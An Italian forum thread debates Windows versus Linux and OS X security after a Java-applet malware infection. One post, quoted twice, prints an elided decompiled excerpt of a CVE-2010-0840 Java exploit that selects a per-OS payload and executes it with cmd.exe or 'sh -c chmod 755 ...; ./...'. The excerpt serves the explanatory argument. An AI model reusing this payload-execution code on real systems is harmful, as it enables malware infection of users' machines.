Dieci anni fa Bill Gates disse: prima di tutto la sicurezza

Quote:

Originariamente inviato da Pier2204

Rileggendo i tuoi post so anche l'alternativa..

Giustamente ognuno ha il diritto di scegliere, per lavoro , passione o diletto le alternative non mancano, ed è giusto che sia così.

Ma parlando di sicurezza non te lo lascio dire, visto che leggendo i tuoi post ti inalberi e non poco se qualcuno osa mettere in discussione anche solo un attimo la nota marca, ho postato sopra un documento TECNICO, dove spiega bene, non il documento del tifoso della curva ovest.

Un sistema come windows, con una diffusione a quel livello, con il supporto a ogni periferica esistente, non è facile mantenere la sicurezza, il lavoro da portare avanti non è semplice.

facile fare un sistema per tre macchine in croce con una diffusione dell'8%, ci provassero a farlo per l'80% del parco installato e delle mille configurazioni, poi ne riparliamo.

Mi spiace deluderti ma io al lavoro uso Linux e a casa OSX per un motivo molto semplice:mi sono rotto le palle di buttare soldi in manutenzione pc o relativo antivirus.
E' inutile menarla,come è inutile far credere alla gente che Windows è ora perfetto.
Non è così per il sacrosanto motivo che tu citi:diffusione al 90%.
Ottimo...se mai un giorno gli altri arriveranno al 30 allora potremmo riparlarne per ora se permetti mi metto comodo al leggere anche i commenti di giamaica,se a te non disturba...

Quote:

Fra lo sbattermi EVENTUALMENTE nel caso in cui dovessi prendere un virus, o lo sbattermi SICURAMENTE per trovare i programmi e i driver per far funzionare quello di cui ho bisogno, sinceramente scelgo la prima opzione.

Sfatiamo un po questa leggenda metropolitana,il web è pieno di gente con Scanner o stampanti di 6 o sette anni fa perfettamente funzionanti e che o non sono più supportate oppure lo sono con grossi limiti.
Io stesso,in occasione del passaggio a Windows vista,sono stato costretto a sostituire la mia scheda wirelless pci con chipset broadcom perché non veniva riconosciuta.
E in ogni caso,qualsiasi distro di Linux la puoi tranquillamente provare prima di installarla.
Scommetto che puoi farlo anche con Windows vero?

[bondocks]

Altro che leggenda metropolitana...

Oppure io sono l'eccezione che conferma la regola

[CubeDs]

Come disse qualcuno più saggio di me qualche tempo fa, l'unico computer sicuro è un computer spento. Nessun s.o. è sicuro quando è in contatto con periferiche esterne o internet. Ogni S.O. ha le sue falle, sta poi all'utente cercare di prevenire o evitarle per quanto possibile.

[Devil402]

Giamaica, non sai cosa stai dicendo. L'exploit usato, come tu stesso hai ammesso, si basa su Java. Java è presente su OSX, Linux e Windows. Ora, lo sviluppatore del malware ha deciso di colpire la base installata maggiore, ma qualora volesse, creare un applicativo del tutto innocuo per il sistema, che si piazza a pieno schermo, lo potrebbe fare anche per OSX e Linux. Non c'è alcuna limitazione tecnica, alcuno strumento di sicurezza in più. ANZI, se proprio dobbiamo dirla tutta, Microsoft Security Essential (Non Defender, come dicevi..), rileva la minaccia e la blocca, ora come ora, perchè è stata inserita nella blacklist, mentre su OSX e Linux saresti totalmente scoperto.

Puoi usare tutti i sistemi che ti pare, come del resto anch'io ho fatto e faccio, ma ciò non cambia i fatti. Quel malware è semplice da realizzare su tutti e 3 i sistemi, e grazie a Java, per di più.

Detto francamente, le tue affermazioni, non hanno alcuna base. Giudicare Windows insicuro a causa di un malware che non sfrutta Windows ma Java, è assurdo.

Si certo è facile da fare su tutti e 3 i sistemi ma guarda un po il caso quando devono fare qualcosa senza perdere troppo tempo la fanno caso strano solo per Windows!
La cosa davvero interessante e che continuerò sempre a chiedermi è che con tutta la gente anti Apple e anti Linux che c'è in giro,esperta in sicurezza...mi chiedo che caxxo ci vorrà mai a creare un exploit anche e SOLO per gli altri 2 sistemi tanto per sputtanare quella piccola percentuale di gente che se la tira!
Eddai su...tutti espertoni ma nessuno che ci prova??
Non è che forse le percentuali contano meno di zero??

[djfix13]

Quote:

Originariamente inviato da Devil402

Giamaica, non sai cosa stai dicendo. L'exploit usato, come tu stesso hai ammesso, si basa su Java. Java è presente su OSX, Linux e Windows. Ora, lo sviluppatore del malware ha deciso di colpire la base installata maggiore, ma qualora volesse, creare un applicativo del tutto innocuo per il sistema, che si piazza a pieno schermo, lo potrebbe fare anche per OSX e Linux. Non c'è alcuna limitazione tecnica, alcuno strumento di sicurezza in più. ANZI, se proprio dobbiamo dirla tutta, Microsoft Security Essential (Non Defender, come dicevi..), rileva la minaccia e la blocca, ora come ora, perchè è stata inserita nella blacklist, mentre su OSX e Linux saresti totalmente scoperto.

Puoi usare tutti i sistemi che ti pare, come del resto anch'io ho fatto e faccio, ma ciò non cambia i fatti. Quel malware è semplice da realizzare su tutti e 3 i sistemi, e grazie a Java, per di più.

Detto francamente, le tue affermazioni, non hanno alcuna base. Giudicare Windows insicuro a causa di un malware che non sfrutta Windows ma Java, è assurdo.

io sono andato ora con windows puro senza AV e con un vecchio java su Stò sito ma giuro che non sono riuscito a prendere ASSOLUTAMENTE NULLA!!!

ma allora è il sito, è Windows, è Java ??? BOOHH

no perchè l'OT è chiaro!
Microsoft ha fatto enormi sforzi per migliorare la sicurezza dei suoi OS oltre che fornire strumenti utili ad evitare problemi (Security Essential) spesso interviene in riparazione o controllo su Bug di altri produttori (UAC impostato al massimo blocca anche il montaggio di link nella zona di avvio automatico) e allora come si fa a dire che Windows non è sicuro!!!

[bondocks]

.

[Pier2204]

Quote:

Originariamente inviato da Navpix

Si certo è facile da fare su tutti e 3 i sistemi ma guarda un po il caso quando devono fare qualcosa senza perdere troppo tempo la fanno caso strano solo per Windows!
La cosa davvero interessante e che continuerò sempre a chiedermi è che con tutta la gente anti Apple e anti Linux che c'è in giro,esperta in sicurezza...mi chiedo che caxxo ci vorrà mai a creare un exploit anche e SOLO per gli altri 2 sistemi tanto per sputtanare quella piccola percentuale di gente che se la tira!
Eddai su...tutti espertoni ma nessuno che ci prova??
Non è che forse le percentuali contano meno di zero??

Mi stupisco che in base a una considerazione del genere si stabilisca il sistema operativo sicuro.. lo spannometro..

Io non sono esperto e lo so, tu non sei esperto e pensi di esserlo, mi sa che sta qui la differenza.

Quarda qui...

http://www.deuxexmachina.it/windows/...ows-vista.html

o qui...

http://translate.google.it/translate...-mac-os-140118

o qui...

http://translate.google.it/translate...e-os%2F&anno=2

[giamaica]

Quote:

Originariamente inviato da Devil402

Giamaica, non sai cosa stai dicendo. L'exploit usato, come tu stesso hai ammesso, si basa su Java. Java è presente su OSX, Linux e Windows. Ora, lo sviluppatore del malware ha deciso di colpire la base installata maggiore, ma qualora volesse, creare un applicativo del tutto innocuo per il sistema, che si piazza a pieno schermo, lo potrebbe fare anche per OSX e Linux. Non c'è alcuna limitazione tecnica, alcuno strumento di sicurezza in più. ANZI, se proprio dobbiamo dirla tutta, Microsoft Security Essential (Non Defender, come dicevi..), rileva la minaccia e la blocca, ora come ora, perchè è stata inserita nella blacklist, mentre su OSX e Linux saresti totalmente scoperto.

Puoi usare tutti i sistemi che ti pare, come del resto anch'io ho fatto e faccio, ma ciò non cambia i fatti. Quel malware è semplice da realizzare su tutti e 3 i sistemi, e grazie a Java, per di più.

Detto francamente, le tue affermazioni, non hanno alcuna base. Giudicare Windows insicuro a causa di un malware che non sfrutta Windows ma Java, è assurdo.

No no aspetta, qui mi sa che se c'è qualcuno che non sa di cosa parla, con tutto il rispetto, sei te. Java è un linguaggio multipiattaforma che utilizza una VM per eseguire codice e puo' essere installato su tutti i sistemi desktop presenti sul mercato, quindi Windows, OSX e Linux.
Java tra le tante tecnologie consente di eseguire applicazioni Java appunto direttamente dal browser web (applet), fornendo una serie di api e librerie che la JRE espone verso il sistema operativo (le piu' banali sono quelle di I/O ad esempio). Ora la "piccolissima" differenza è che il malware in questione su linux o osx non avrebbe potuto eseguire una benemerita ceppa e sarebbe nato e morto con la chiusura del processo del browser (ie9 su windows).
Su microsoft invece, l'applet puo' tranquillamente scaricare un file .exe nella tmp dell'utente (e fino a qui nulla di male tutto sommato). Ma la chicca del sicurissimo windows è che poi è sufficiente linkare, sempre lato applet, il file exe dentro la cartella Esecuzione automatica dell'utente, per essere richiamato ogni volta che parte il sistema operativo.
Inoltre, per come è strutturato il processo explorer che gestisce tutta l'interfaccia grafica e da cui dipendono a cascata tutti i processi di gestione delle finestre (si chiama windows per questo),c'è una doppia falla. Da utente si puo' modificare la modalità di apertura a schermo intero inibendo tutti i processi a passare in primo piano. In pratica puoi trasformare all'avvio il desktop in una pagina che ti nasconde la barra dei menu e ti impedisce di lanciare i programmi e di chiudere quella finestra specifica. E' come se su linux da browser web riesco a lanciare un'applet che all'avvio del sistema modifica la configurazione del X Server e non mi carica gnome. Cose da fantascienza!!!

Io non faccio il tifo nè per linux, nè per apple. Utilizzo tutti i sistemi e ne riconosco pregi e difetti come in tutte le cose, ma per favore non parliamo di sicurezza dei sistemi windows perchè è una cosa che fà semplicemente ridere.

[GmG]

Quote:

Originariamente inviato da giamaica

No no aspetta, qui mi sa che se c'è qualcuno che non sa di cosa parla, con tutto il rispetto, sei te. Java è un linguaggio multipiattaforma che utilizza una VM per eseguire codice e puo' essere installato su tutti i sistemi desktop presenti sul mercato, quindi Windows, OSX e Linux.
Java tra le tante tecnologie consente di eseguire applicazioni Java appunto direttamente dal browser web (applet), fornendo una serie di api e librerie che la JRE espone verso il sistema operativo (le piu' banali sono quelle di I/O ad esempio). Ora la "piccolissima" differenza è che il malware in questione su linux o osx non avrebbe potuto eseguire una benemerita ceppa e sarebbe nato e morto con la chiusura del processo del browser (ie9 su windows).
Su microsoft invece, l'applet puo' tranquillamente scaricare un file .exe nella tmp dell'utente (e fino a qui nulla di male tutto sommato). Ma la chicca del sicurissimo windows è che poi è sufficiente linkare, sempre lato applet, il file exe dentro la cartella Esecuzione automatica dell'utente, per essere richiamato ogni volta che parte il sistema operativo.
Inoltre, per come è strutturato il processo explorer che gestisce tutta l'interfaccia grafica e di input del sistema operativo c'è una doppia falla. Da utente si puo' modificare la modalità di apertura a schermo intero inibendo tutti i dispositivi di input e impossibilitando tutti i processi a passare in primo piano.

Io non faccio il tifo nè per linu, nè per apple. Utilizzo tutti i sistemi e ne riconosco pregi e difetti come in tutte le cose, ma per favore non parliamo di sicurezza dei sistemi windows perchè è una cosa che fà semplicemente ridere.

Falso.

Nel tuo caso il payload caricato dall'exploit era per windows ed ha causato i danni da te elencati, ma nulla vieta all'autore del exploit di creare paylaod per osx o linux (solamente che dato la diffusione di windows il rapporto costo di realizzazione e guadagni è nettamente a favore di windows)

ps. per chi dice che su linux e osx il malware non può essere eseguito perché non ha i permessi di esecuzione

tratto da questo exploit java CVE-2010-0840

https://www.virustotal.com/file/c39c...is/1326833631/

Codice:

if (str2.indexOf("Windows") != -1)
      {
        str1 = "win32.bin";

...

        localObject2[0] = "cmd.exe";
        localObject2[1] = "/c";
        localObject2[2] = localObject1;
      } else if (str2.indexOf("Mac OS X") != -1)
      {
        str1 = "osx.bin";

...
        localObject2[0] = "sh";
        localObject2[1] = "-c";
        localObject2[2] = ("chmod 755 " + (String)localObject1 + "; ./" + (String)localObject1);
      } else if (str2.indexOf("Linux") != -1)
      {
        str1 = "linux.bin";
...
        localObject2[0] = "sh";
        localObject2[1] = "-c";
        localObject2[2] = ("chmod 755 " + (String)localObject1 + "; ./" + (String)localObject1);
      }
...
...
...
ed eseguire

     Runtime localRuntime = Runtime.getRuntime();
     Process localProcess = localRuntime.exec(localObject2);

Payload per tutti i sistemi operativi.

[Piccioneviaggiatore]

Esatto.....non esistono sistemi operativi sicuri!
Alcuni lo sono piu' altri e i prodotti microsoft non sono eccellenti da questo punto di vista.
Sto' usando Matriux e come browser Mantra ...permettetemi di dire che mi sento molto piu' sicuro cosi' che usar windows seven e explorer.
Se il vostro punto di vista e' diverso,sono molto ma molto felice per voi.
ps.
Non mi pare che in 10 anni a Redmond abbian fatto miracoli,ne faceva quasi di piu' Do Nascimiento!

[Alfhw]

Quote:

Originariamente inviato da dwfgerw

non è che ci siano riusciti molto... La cosa migliore per neutralizzare completamente certi tipi di attacchi e software malevolo è il controllo totale della piattaforma e le applicazioni sandboxing

Da XP a 7 c'è un abisso come sicurezza. Non scherziamo.

Quote:

Originariamente inviato da II ARROWS

Ma che dite? Sono passati dall'avere una botte di adamantio ad avere una cosa che si buca con una semplice chiamata a un processo di sistema!

Nel suo valore predefinito su Windows 7 è come non averlo, altro che migliorato!

Falso. Su Windows 7 l'UAC nel valore di default offre una protezione intermedia.

Quote:

Originariamente inviato da giamaica

Non sono un guru delle tecnologie microsoft, ma ad occhio e croce rispetto ad altri sistemi tipo Linux e OSX (che uso molto spesso) windows è ancora un giocattolo pieno di magagne.

Quote:

Originariamente inviato da giamaica

Non voglio essere presuntuoso, per cui dico solo che sono abbastanza addentro alla questione, visto che lavoro nel settore informatico e passo gran parte della mia giornata sul computer. Anche io negli ultimi 5-6 anni con diverse versioni di windows non ho preso virus e quello di qualche giorno fà sono fortunatamente riuscito ad eliminarlo senza troppi sbattimenti o come si direbbe in azienda, disservizi particolari. Pero' devo anche dire che le stesse cose che faccio con windows (navigazione, p2p, ecc...) le faccio anche su linux e su OSX e per la loro natura simil UNIX certe cose semplicemente non possono accadere.

Qui non si tratta di difendere tizio piuttosto che caio, ma è innegabile che le tecnologie microsoft lato sicurezza sono ancora piuttosto carenti.

Quote:

Originariamente inviato da giamaica

Comunque guarda, anche io davo alla gente dell'incompetente quando si lamentavano di windows e dei virus che si beccavano un giorno si e l'altro pure, ma da qui a dire che windows è sicuro e la colpa è quasi sempre dell'utente ce ne passa.

Solita esagerazione e accozzaglia di luoghi comuni. Tutte quelle cose possono succedere anche con MacOS e Linux però questi OS sono molto meno attaccati.
Anche Charlie Miller in più di una occasione ha giudicato MacOS tecnicamente meno sicuro di Windows. Magari è incompetente pure lui...
Ogni OS ha le sua magagne di sicurezza. Non si può giudicare solo per una falla grossa o piccola che sia. Windows non è perfetto ma non lo sono neanche gli altri e non è neanche un giocattolo.

Quote:

Originariamente inviato da Navpix

Bhè leggendo gli ultimi post e le ultime disavventure alla fine dopo dieci anni non è cambiata una mazza.

Eh già... da XP a 7 non è proprio cambiato una mazza... Trollata vecchia.

Quote:

Originariamente inviato da Pier2204

Giustamente ognuno ha il diritto di scegliere, per lavoro , passione o diletto le alternative non mancano, ed è giusto che sia così.

Ma parlando di sicurezza non te lo lascio dire, visto che leggendo i tuoi post ti inalberi e non poco se qualcuno osa mettere in discussione anche solo un attimo la nota marca, ho postato sopra un documento TECNICO, dove spiega bene, non il documento del tifoso della curva ovest.

Un sistema come windows, con una diffusione a quel livello, con il supporto a ogni periferica esistente, non è facile mantenere la sicurezza, il lavoro da portare avanti non è semplice.

facile fare un sistema per tre macchine in croce con una diffusione dell'8%, ci provassero a farlo per l'80% del parco installato e delle mille configurazioni, poi ne riparliamo.

Quoto.

Quote:

Originariamente inviato da Arnoldforever

E dopo 10 anni su questo forum non è cambiato niente... i trollazzi gira e rigira sono sempre gli stessi, sopratutto quando si parla di Microsoft!

Miglior post del thread.

Quote:

Originariamente inviato da giamaica

Qui si sta discutendo sulla sicurezza di un sistema operativo e di conseguenza sulla bontà del software. Non so tu che esperienze abbia, ma io utilizzo ogni santo giorno Windows, Leopard e Linux.

Il malware me lo sono beccato sul sito ddlhits con IE9. Su quel sito ci vado spessissimo (praticamente ogni giorno) anche con Linux e col MAc, a seconda della macchina che sto utilizzando. Solo con microsoft, facendo un click sbagliato su un banner riesci a fotterti l'interfaccia di explorer con conseguente blocco totale delle funzionalità del sistema operativo.

E' inutile che stai a menarla sul come è successo, su quanto tempo ci vuole a risolvere il problema e su di chi è o non è la colpa.

Se mia suocera che a mala pena sa usare il tostapane le và di andare su internet col mac o con linux puo' permettersi di fare tutte le cavolate che vuole. Se lo fà con windows il giorno dopo non usa piu' il computer e deve chiamare qualcuno per risolvere il problema.

Queste sono le differenze tra un sistema sicuro e uno non sicuro.

La sicurezza di un sistema non si giudica da un episodio e senza tenere conto delle percentuali di diffusione di un OS. Ma nel 2012 è ancora necessario spiegarlo?

Quote:

Originariamente inviato da Navpix

Sfatiamo un po questa leggenda metropolitana,il web è pieno di gente con Scanner o stampanti di 6 o sette anni fa perfettamente funzionanti e che o non sono più supportate oppure lo sono con grossi limiti.
Io stesso,in occasione del passaggio a Windows vista,sono stato costretto a sostituire la mia scheda wirelless pci con chipset broadcom perché non veniva riconosciuta.

Non c'è nessuna leggenda metropolitana. E' la verità che su Linux si impazzisce molto più spesso per configurare questo o quello. Inutile che citi un episodio particolare per distorcere la realtà. Chi lo nega non conosce bene Linux oppure parla da tifoso. Prova decine di distro Linux per qualche anno e poi ne riparliamo. E la colpa non è solo della scarsa diffusione di Linux ma soprattutto della sua frammentazione e i troppi fork e cambiamenti di versione.

Quote:

Originariamente inviato da CubeDs

Come disse qualcuno più saggio di me qualche tempo fa, l'unico computer sicuro è un computer spento.

Arguto ma inesatto. Un bravo ingegnere sociale ti convincerà ad accenderlo per poi infettarlo (citazione da Kevin Mitnick).

Quote:

Originariamente inviato da Navpix

Si certo è facile da fare su tutti e 3 i sistemi ma guarda un po il caso quando devono fare qualcosa senza perdere troppo tempo la fanno caso strano solo per Windows!
La cosa davvero interessante e che continuerò sempre a chiedermi è che con tutta la gente anti Apple e anti Linux che c'è in giro,esperta in sicurezza...mi chiedo che caxxo ci vorrà mai a creare un exploit anche e SOLO per gli altri 2 sistemi tanto per sputtanare quella piccola percentuale di gente che se la tira!
Eddai su...tutti espertoni ma nessuno che ci prova??
Non è che forse le percentuali contano meno di zero??

Eccone un altro che confronta un OS che ha oltre il 90% di mercato con altri che hanno il 6-7% o meno... Ed è pure convinto che non conta nulla...

[giamaica]

Quote:

Originariamente inviato da GmG

Falso.

Nel tuo caso il payload caricato dall'exploit era per windows ed ha causato i danni da te elencati, ma nulla vieta all'autore del exploit di creare paylaod per osx o linux (solamente che dato la diffusione di windows il rapporto costo di realizzazione e guadagni è nettamente a favore di windows)

ps. per chi dice che su linux e osx il malware non può essere eseguito perché non ha i permessi di esecuzione

tratto da questo exploit java CVE-2010-0840

https://www.virustotal.com/file/c39c...is/1326833631/

Codice:

if (str2.indexOf("Windows") != -1)
      {
        str1 = "win32.bin";

...

        localObject2[0] = "cmd.exe";
        localObject2[1] = "/c";
        localObject2[2] = localObject1;
      } else if (str2.indexOf("Mac OS X") != -1)
      {
        str1 = "osx.bin";

...
        localObject2[0] = "sh";
        localObject2[1] = "-c";
        localObject2[2] = ("chmod 755 " + (String)localObject1 + "; ./" + (String)localObject1);
      } else if (str2.indexOf("Linux") != -1)
      {
        str1 = "linux.bin";
...
        localObject2[0] = "sh";
        localObject2[1] = "-c";
        localObject2[2] = ("chmod 755 " + (String)localObject1 + "; ./" + (String)localObject1);
      }
...
...
...
ed eseguire

     Runtime localRuntime = Runtime.getRuntime();
     Process localProcess = localRuntime.exec(localObject2);

Payload per tutti i sistemi operativi.

Questo stralcio di codice non dimostra nulla. Li c'è solo scritto che (detto alla sempliciotta) if os = osx o linux ... localOject viene valorizzato in base alla release e finito il controllo valorizza l'oggetto localProcess e fà una exec ecc.. ec...

Diciamo pure che a quel punto l'applet fà una exec di un processo e lancia un programma che ha scaricato della cartella download dell'utente safari o mozilla, poi?

L'owner di Java su un sistema operativo linux e su OSX non potrà mai e poi mai modificare l'init della macchina e caricare quel processo malware all'avvio del sistema, a meno che non sei cosi' furbo da aver fatto sudo su root e aver installato java. Nel caso specifico poi, anche se riuscissi a fare questo dovresti impegnarti molto di piu' per bloccare il desktop su OSX o su linux. Per come sono implementati appple, gnome e kde non puoi lanciare una finestra a schermo intero nascondendo barra dei menu e inibendono la chiusura e lo spostamento in background con la tastiera.

E' una questione di progettazione, c'è poco da fare.

[GmG]

Mica un malware deve per forza avviarsi all'avvio per far danno.
Ad esempio un malware può criptare tutti i documenti/immagini e chiederti un riscatto per decriptarli.

https://www.pcalsicuro.com/main/2011...ndows-e-linux/

EDIT:
Nell'articolo è spiegato come in linux un malware con privilegi limitati può intercettare la password di amministrazione.

[giamaica]

Quote:

Originariamente inviato da Alfhw

Solita esagerazione e accozzaglia di luoghi comuni. Tutte quelle cose possono succedere anche con MacOS e Linux però questi OS sono molto meno attaccati.
Anche Charlie Miller in più di una occasione ha giudicato MacOS tecnicamente meno sicuro di Windows. Magari è incompetente pure lui...
Ogni OS ha le sua magagne di sicurezza. Non si può giudicare solo per una falla grossa o piccola che sia. Windows non è perfetto ma non lo sono neanche gli altri e non è neanche un giocattolo.

La sicurezza di un sistema non si giudica da un episodio e senza tenere conto delle percentuali di diffusione di un OS. Ma nel 2012 è ancora necessario spiegarlo?

Questa è un'altra teoria falsa che a forza di essere ripetuta è diventata un dogma.

La diffusione di windows e la sua vulnerabilità sono due condizioni correlate ma non proporzionali. E' chiaro che se in rete ci stanno 2 computer windows e 10.000 linux gireranno piu' malware per linux, ma questo non dimostra che un sistema operativo sia piu' sicuro di un altro. Io riporto la mia esperienza e non parlo per sentito dire o perchè qualcuno da un trespolo si atteggia a guru e vuole fare l'esperto di sicurezza.

Basta leggere un po' di letteratura su Unix-Linux e smanettare un po' sui sistemi operativi per capire senza troppe difficoltà che windows è per sua natura un sistema piu' vulnerabile, poi come dici tu essendo piu' diffuso è chiaro che è piu' esposto ad attacchi.

Su internet ci vado da quando esistevano i primi modem 56k ed è una vita che sto in rete con macchine windows (dalla 3.11), OSX da quando rilasciarono Cheetah e Linux con le primissime release RedHat. Sarà un caso, sarà una fatalità, sarà sfiga, chiamala come vuoi tu, ma su linux e su OSX non mai e poi mai avuto nessun problema dovuto a malware o spyware o virus.

Eppure oh, in piu' di 10 anni sarà girato in rete qualche codice malevolo che non fosse scritto per windows no???

[giamaica]

Quote:

Originariamente inviato da GmG

Mica un malware deve per forza avviarsi all'avvio per far danno.
Ad esempio un malware può criptare tutti i documenti/immagini e chiederti un riscatto per decriptarli.

https://www.pcalsicuro.com/main/2011...ndows-e-linux/

EDIT:
Nell'articolo è spiegato come in linux un malware con privilegi limitati può intercettare la password di amministrazione.

Si ok, ma c'è una bella differenza nel poter bloccare il sistema operativo e renderti all'avvio la macchina inutilizzabile. Un conto poi è intercettare la password e poi eventualmente usarla in successivi attacchi, un altro conto è poter registrare un servizio all'avvio senza neanche doverla avere la password. E comunque cerchiamo di distinguere tra rischi potenziali e rischi reali. Ma chi è che ti cripta i documenti e poi ti chiede un riscatto dai, il tuo vicino di casa? Parliamo di malware e spyware su larga scala, non di codice che l'hacker di guerra termonucleareglobale si diverte a scrivere per fare un dispetto all'amichetto ...

[z0x]

anche se cè ancora da lavorare,in 10 anni la microsoft ha fatto importanti passi avanti.

[Devil402]

Scusa eh, su Ubuntu ricordo di aver avuto programmi che avevano il loro bel processo all'avvio, ma non ricordo di aver dovuto inserire in alcun modo la password perchè si mettessero all'avvio del sistema. Non ho mai detto di essere un esperto in ogni caso. Fottesega se vuoi continuare a sparare una marea di cose insensate, alla fin fine, il paladino dell'os sei te, mica io

In ogni caso. Ti ripeto, il malware poteva essere agilmente scritto anche per linux ed OSX. Non c'è niente da dire in merito. Non è chissà quale programmone, eh! E' un fregatissimo programma che si avvia con il pc (come tanti altri...) non necessita di privilegi di amminstrazione, ed è in grado di bloccarti il lavoro. Che poi, oltretutto, mi dispiace dirtelo, ma mi sa che qualcosa l'hai fatta. Perchè ora che ricordo, il malware in questione blocca anche il Task Manager, ma per farlo al primo avvio, su Vista e Seven parte l'UAC perchè si vanno a modificare dei permessi relativi alle policy di sicurezza se non erro. Su XP, è inutile parlarne, si piazza lì e ti tocca andare a rimuoverlo... ma su Vista e 7, ho qualche dubbio che possa funzionare senza alcun permesso... Poi beh, non ne sono certo, ma son sicuro che servono i permessi per bloccare il task manager.

[giamaica]

Quote:

Originariamente inviato da Devil402

Scusa eh, su Ubuntu ricordo di aver avuto programmi che avevano il loro bel processo all'avvio, ma non ricordo di aver dovuto inserire in alcun modo la password perchè si mettessero all'avvio del sistema. Non ho mai detto di essere un esperto in ogni caso. Fottesega se vuoi continuare a sparare una marea di cose insensate, alla fin fine, il paladino dell'os sei te, mica io

In ogni caso. Ti ripeto, il malware poteva essere agilmente scritto anche per linux ed OSX. Non c'è niente da dire in merito. Non è chissà quale programmone, eh! E' un fregatissimo programma che si avvia con il pc (come tanti altri...) non necessita di privilegi di amminstrazione, ed è in grado di bloccarti il lavoro. Che poi, oltretutto, mi dispiace dirtelo, ma mi sa che qualcosa l'hai fatta. Perchè ora che ricordo, il malware in questione blocca anche il Task Manager, ma per farlo al primo avvio, su Vista e Seven parte l'UAC perchè si vanno a modificare dei permessi relativi alle policy di sicurezza se non erro. Su XP, è inutile parlarne, si piazza lì e ti tocca andare a rimuoverlo... ma su Vista e 7, ho qualche dubbio che possa funzionare senza alcun permesso... Poi beh, non ne sono certo, ma son sicuro che servono i permessi per bloccare il task manager.

Coi "ricordo", i "mi pare", i "poteva" si puo' dire tutto e il contrario di tutto, anche che Gesu cristo è morto di freddo. Se vuoi discutere di fatti devi anche essere specifico e citare ad esempio di che programmi parli. Non mi pare di aver sparato nulla di insensato, se non capisci oltre un certo livello di approfondimento non è un mio problema. Non mi frega nulla di convincerti se su osx o linux una applet non puo' caricare un processo all'avvio, per me puoi rimanere tranquillamente delle tue convinzioni. Sono sempre pronto ad ascoltare chi ne sa piu' di me e sono grato a chi puo' arricchire il mio sapere su certi argomenti che magari non conosco cosi' a fondo, ma te di certo non mi pare sei nella condizione di spiegarmi le tecnologie microsoft meglio di quanto sappia fare un qualunque "ragazzotto" dell'help desk ...

[Devil402]

giamaica, senti, fammi il cavolo del piacere di non sentirti superiore a nessuno qui dentro, perchè se è così, per quanto mi riguarda, puoi parlare pure da solo. Sono interi post in cui non sono il solo a dirti che quel banalissimo malware può essere replicato anche sugli altri sistemi. Se sei fermo nelle tue convinzioni, non postare più e non rompere l'anima alla gente che sta nel thread.

Non ho mai detto di essere superiore a te o di poterti spiegare nulla, e questa sarà la terza volta che te lo dico, alla prossima continui da solo e ti diverti a dire che il tuo linux od OSX è molto più sicuro di Windows, basando le tue affermazioni su un malware che si insedia nel sistema tramite Java, e che nel sistema, non fa NULLA, perchè nulla può fare se non avviarsi a pieno schermo all'avvio.

Ti han già dimostrato, che è possibile sfruttare java su tutti e 3 i sistemi per avviare un eseguibile. Ora, se su tutti e tre i sistemi, per fare ciò che deve fare, non ha bisogno di alcun permesso, cosa ti fa credere che sia difficile creare una versione del malware per ognuno di essi?

Metti in conto che deve semplicemente avviarsi a pieno schermo all'avvio del pc. Che io sappia, un programma su OSX o Linux non ha bisogno di privilegi d'amministrazione per fare ciò, sbaglio?

Nessuno qui sta dicendo che Windows sia una botte di adamantio. Ma per carità, almeno evitiamo di dire trollate del genere, perchè credo proprio che quel malware sia uno dei pochi che con Windows ha poco a che fare. Ce ne stanno di ben peggiori, sia per Windows che per Linux ed OSX. Ogni sistema ha le sue pecche, debolezze e punti di forza.